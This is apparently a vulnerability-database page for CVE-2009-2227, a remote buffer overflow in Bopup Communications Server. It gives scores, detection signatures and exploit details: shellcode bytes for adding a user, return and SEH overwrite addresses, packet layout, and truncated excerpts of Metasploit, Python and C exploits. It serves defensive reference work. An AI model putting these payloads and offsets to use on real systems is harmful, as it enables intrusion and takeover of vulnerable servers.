CVE-2009-2227
published 2009-06-26CVE-2009-2227: Stack-based buffer overflow in B Labs Bopup Communication Server 3.2.26.5460 allows remote attackers to execute arbitrary code via a crafted request to TCP…
PriorityP273critical10CVSS 2.0
AVNACLAuNCCICAC
EXPLOIT
EPSS
68.58%
99.3th percentile
Stack-based buffer overflow in B Labs Bopup Communication Server 3.2.26.5460 allows remote attackers to execute arbitrary code via a crafted request to TCP port 19810.
Affected
1 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| blabsoft | bopup_communication_server | — | — |
Detection & IOCsextracted from sources · hover to see the quote
bytes↗
\x81\xc4\xff\xef\xff\xff\x44
bytes↗
\x01\x00\x00\x00
bytes↗
\xfc\x6a\xeb\x4d\xe8\xf9\xff\xff\xff\x60\x8b\x6c\x24\x24\x8b\x45
- →Detect exploit attempts by monitoring for TCP connections to port 19810 carrying a packet whose first 4 bytes are \x01\x00\x00\x00 followed by a large (~829+ byte) payload — the characteristic structure of the Bopup Communications Server buffer overflow exploit. ↗
- →Payload bad characters for this exploit are \x00\x09\x0a\x0d\x20\x22\x25\x26\x27\x2b\x2f\x3a\x3c\x3e\x3f\x40; encoded shellcode on the wire will avoid these bytes — use this to tune IDS signatures. ↗
- →The Python PoC exploit sends a payload starting with \x01\x00\x00\x00 followed by 821 bytes of padding/shellcode, then 27 bytes padding, a 5-byte call-back instruction, and a SEH overwrite — total packet length is BOPUP_STR_OFFSET (0x19) + BOPUP_STR_LEN (0x348+8) bytes. ↗
- ·The return address 0x0041add2 (Metasploit) and 0x00401DD5 (C PoC) are version-specific to Bopup Communications Server 3.2.26.5460 only; exploitation against other versions requires different offsets. ↗
- ·The SEH overwrite address 0x004014E0 is described as 'universal' (p/p/r in bcssrvc) for the target version, but this may not hold across service pack levels or recompilations. ↗
CVEs like this are exactly what “Exploited This Week” covers.
Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.
No detection rules found.
Exploit-DB
Bopup Communications Server - Remote Buffer Overflow (Metasploit)
exploitdb·2010-05-09
CVE-2009-2227 Bopup Communications Server - Remote Buffer Overflow (Metasploit)
Bopup Communications Server - Remote Buffer Overflow (Metasploit)
---
##
# $Id: bopup_comm.rb 9262 2010-05-09 17:45:00Z jduck $
##
##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##
require 'msf/core'
class Metasploit3 'Bopup Communications Server Buffer Overflow',
'Description' => %q{
This module exploits a stack buffer overflow in Bopup Communications Server 3.2.26.5460.
By sending a specially crafted packet, an attacker may be
able to execute arbitrary code.
},
'Author' => [ 'MC' ],
'License' => MSF_LICENSE,
'Version' => '$Revision: 9262 $',
'References' =>
[
[ 'CVE', '2009-2227'
Exploit-DB
Bopup Communications Server 3.2.26.5460 - Remote Buffer Overflow (SEH)
exploitdb·2009-06-29
CVE-2009-2227 Bopup Communications Server 3.2.26.5460 - Remote Buffer Overflow (SEH)
Bopup Communications Server 3.2.26.5460 - Remote Buffer Overflow (SEH)
---
#!/usr/bin/python
#[*] Usage : python bopup.py [target_ip]
# _ _ _ __ _ _ _
#| || | (_) ___ / \ | |__ | | |
#| __ | | | (_-" %sys.argv[0]
sys.exit(0)
# win32_adduser - PASS=27 EXITFUNC=seh USER=dz Size=228 Encoder=PexFnstenvSub http://metasploit.com
shellcode=(
"\x44\x7A\x32\x37\x44\x7A\x32\x37\x29\xc9\x83\xe9\xcd\xd9\xee\xd9"
"\x74\x24\xf4\x5b\x81\x73\x13\x05\x16\xf2\x06\x83\xeb\xfc\xe2\xf4"
"\xf9\xfe\xb6\x06\x05\x16\x79\x43\x39\x9d\x8e\x03\x7d\x17\x1d\x8d"
"\x4a\x0e\x79\x59\x25\x17\x19\x4f\x8e\x22\x79\x07\xeb\x27\x32\x9f"
"\xa9\x92\x32\x72\x02\xd7\x38\x0b\x04\xd4\x19\xf2\x3e\x42\xd6\x02"
"\x70\xf3\x79\x59\x21\x17\x19\x60\x8e\x1a\xb9\x8d\x5a\x0a\xf3\xed"
"\x8e\x0a\x79\x07\xee\x9f\xae\x22\x01\xd5\xc3\xc6\x61\x9d\
Exploit-DB
Bopup Communications Server 3.2.26.5460 - Remote SYSTEM
exploitdb·2009-06-22
CVE-2009-2227 Bopup Communications Server 3.2.26.5460 - Remote SYSTEM
Bopup Communications Server 3.2.26.5460 - Remote SYSTEM
---
/* bopup-down.c
*
* Copyright (c) 2008 by
*
* Bopup Communications Server remote SYSTEM exploit
* by mu-b - Sat Feb 08 2008
*
* - Tested on: Bopup Communications Server 3.2.26.5460 (Mar 18 2009)
*
* .text:00407A17 lea eax, [ebp+pkt_0x19]
* .text:00407A1D push eax
* .text:00407A1E lea eax, [ebp+var_354]
* .text:00407A24 push eax
* .text:00407A25 call _strcpy
*
* note: this is updated over time for newer versions, I can't be bothered
* making it universal nor anything else...
*
* - Private Source Code -DO NOT DISTRIBUTE -
* http://www.digit-labs.org/ -- Digit-Labs 2008!@$!
*/
#include
#include
#include
#include
#include
#include
#include
#define BUF_SIZE 2048
#define BOPUP_STR_OFFSET 0x19
#define BOPUP_STR_LEN 0x348+8
#define
Metasploit
Bopup Communications Server Buffer Overflow
metasploit
Bopup Communications Server Buffer Overflow
Bopup Communications Server Buffer Overflow
This module exploits a stack buffer overflow in Bopup Communications Server 3.2.26.5460. By sending a specially crafted packet, an attacker may be able to execute arbitrary code.
No writeups or analysis indexed.
http://osvdb.org/55275http://secunia.com/advisories/35516http://www.exploit-db.com/exploits/9002http://www.vupen.com/english/advisories/2009/1645https://exchange.xforce.ibmcloud.com/vulnerabilities/51305http://osvdb.org/55275http://secunia.com/advisories/35516http://www.exploit-db.com/exploits/9002http://www.vupen.com/english/advisories/2009/1645https://exchange.xforce.ibmcloud.com/vulnerabilities/51305
2009-06-26
Published